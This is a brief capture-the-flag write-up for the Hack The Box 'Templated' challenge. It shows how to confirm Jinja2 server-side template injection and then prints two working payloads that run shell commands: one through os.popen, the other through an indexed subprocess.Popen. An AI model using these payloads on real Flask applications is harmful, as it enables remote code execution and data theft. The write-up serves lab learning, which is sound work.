HTB Templated - Writeup

Navigating through the website

Requested: GET /invalid -> we got invalid

Verifying if SSTI is possible

Requested: GET /invalid{{7*7}} -> we got invalid49 instead of invalid{{7*7}}

We know that it is Jinja2 and Flask, so we can use their payload.

Getting the flag

Requested: GET /{{config.__class__.__init__.__globals__['os'].popen('cat%20flag.txt').read()}} -> we got the flag

Alternative

Finding subprocess.Popen index.

1. GET /{{''.__class__.mro()[1].__subclasses__()[100:] -> Popen is there in the list
2. GET /{{''.__class__.mro()[1].__subclasses__()[300:] -> Popen is there in the list
3. GET /{{''.__class__.mro()[1].__subclasses__()[500:] -> Internal Server Error
4. GET /{{''.__class__.mro()[1].__subclasses__()[400:] -> Popen is there in the list
5. GET /{{''.__class__.mro()[1].__subclasses__()[450:] -> Popen is NOT there in the list
6. GET /{{''.__class__.mro()[1].__subclasses__()[414] -> Popen exists

GET /{{''.__class__.mro()[1].__subclasses__()[414]('cat%20flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}

References:

• https://blog.nvisium.com/p263
• https://blog.nvisium.com/p255
• https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection